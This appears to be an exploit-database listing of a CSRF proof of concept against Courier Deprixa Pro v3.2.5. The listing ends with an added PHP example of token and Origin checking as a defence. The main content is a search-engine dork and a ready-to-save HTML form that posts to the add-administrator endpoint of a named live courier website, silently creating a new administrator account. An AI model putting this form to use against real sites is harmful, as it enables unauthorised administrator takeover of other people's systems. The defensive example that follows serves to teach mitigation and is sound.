Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability

CVE: N/A
Category: CWE-352
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-07-10
CPE: cpe:cpe:/a:courier:deprixa_pro_integrated_web_system:3.2.5
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
EPSS: 0
EPSSP: 0


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070107

Below is a copy:

Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability
====================================================================================================================================
| # Title     : Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability                                              |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Vendor    : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982                                 |  
| # Dork      : DEPRIXA 3.2.5 | lOGIN                                                                                              |
====================================================================================================================================


poc :

[+] Dorking in Google or other search engine

[+] Save Code as HT.html

<div class="modal-content">
  <div class="modal-header">
<h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>
  </div>
  <div class="modal-body">
  <!-- Modal body: the form goes here -->
<form action="https://bluedotcourrier.com/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate="" novalidate="" method="post" class="form-horizontal" enctype="multipart/form-data">
  <div class="form-group " id="gnombrepa">
<label for="off_name" class="col-sm-2 control-label"></label>
<div class="col-sm-10">
  <input class="form-control off_name" parsley-trigger="change" required="" name="name_parson" placeholder="Administrator Name" data-parsley-id="4" type="text">
</div>
  </div>
  <div class="form-group" id="gapellido">
<label for="email" class="col-sm-2 control-label">Email</label>
<div class="col-sm-5">
  <input class="form-control email" name="email" id="id_mail" placeholder="[email protected]" required="" onkeyup="javascript:validateMail('id_mail')" data-parsley-id="6" type="text">
  <strong><span id="emailOK"></span></strong>
<p class="error"></p>
</div>
<div class="col-sm-5">
  <input class="form-control phone" name="phone" parsley-trigger="change" required="" placeholder="Phone" data-parsley-id="8">  
</div>
  </div>
  <div class="form-group" id="gemail">
<label for="office" class="col-sm-2 control-label">Office</label>
<div class="col-sm-5">
  <input class="form-control office" parsley-trigger="change" required="" name="office" placeholder="Name of the Office" data-parsley-id="10" type="text">
</div>
<div class="col-sm-5">
<select type="text" class="form-control role" name="role" data-parsley-id="12">
  <option value="Administrator">Administrator</option>
</select>
</div>
  </div>
  <div class="form-group " id="gnombre">
<label for="off_name" class="col-sm-2 control-label">User</label>
<div class="col-sm-10">
  <input class="form-control off_name" parsley-trigger="change" required="" name="name" placeholder="Username" data-parsley-id="14" type="text">
</div>
  </div>
  <div class="form-group" id="gpassword">
<label for="pwd" class="col-sm-2 control-label">Password</label>
<div class="col-sm-10">
  <input class="form-control pwd" parsley-trigger="change" required="" name="pwd" placeholder="Password" data-parsley-id="16" type="text">
</div>
  </div>
  <br><br>
<div class="col-sm-offset-2 col-sm-10">
<div class="checkbox">
  <label class="i-checks i-checks-sm">
<input type="checkbox" name="estado" value="1" onclick="return false" checked >
<i></i>
State  </label>
</div>
<div class="checkbox">
  <label class="i-checks i-checks-sm">
<input type="checkbox" name="type" value="a" onclick="return false" checked >
<i></i>
User Type  </label>
</div>
</div>
  
<!-- End of modal body -->
</div>
 </br></br>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>
Close</button>
<input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">
</div>
</form>
</div>
  </div>
</div>
<!-- end of new-user modal -->
</div>
<!-- end of new-user modal -->
  </div>
</div>       
  </div>
  <!-- / service -->
</div>
  </div>
  <!-- / main -->    
</div>
    </div>
  </div>
  <!-- / content -->


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================
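
The PoC form above contains no per-session token field, so the add-administrator request looks the same whether it comes from the dashboard or from a page on another site. The following is an added example, not code from the advisory or from the vendor: a synchronizer-token check combined with an Origin/Referer check that a PHP handler for such a state-changing request can apply. The function names, the `csrf_token` field name and the `app.example` host are assumptions made for illustration.

```php
<?php
// Added example: not Deprixa's code. Function names, the "csrf_token" field
// and the app.example host are assumptions made for illustration.

// Issue (or reuse) a per-session token; the form embeds it as a hidden field.
function csrf_issue(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only when Origin (or, failing that, Referer) names our own host.
// A missing header or the literal "null" origin yields no host and is rejected.
function same_origin(array $server, string $expectedHost): bool {
    $src  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Gate for a state-changing handler such as an "add administrator" endpoint.
function csrf_check(array $session, array $post, array $server, string $host): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    if (!same_origin($server, $host)) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; both operands must be strings.
    return is_string($expected) && is_string($given)
        && $expected !== '' && hash_equals($expected, $given);
}

// Constructed requests (sample data, not captured traffic).
$session = [];
$token   = csrf_issue($session);
$fields  = ['name' => 'newadmin', 'pwd' => 'example', 'role' => 'Administrator'];
$own     = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://app.example'];
$foreign = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'];

// Same-site form carrying the token, cross-site form without it,
// and a same-site request that omits the token.
var_dump(csrf_check($session, $fields + ['csrf_token' => $token], $own, 'app.example'));
var_dump(csrf_check($session, $fields, $foreign, 'app.example'));
var_dump(csrf_check($session, $fields, $own, 'app.example'));
```

In a real handler the three arrays would be `$_SESSION`, `$_POST` and `$_SERVER`, and the check would run before any account is created. Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` adds a second layer for cross-site POSTs.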
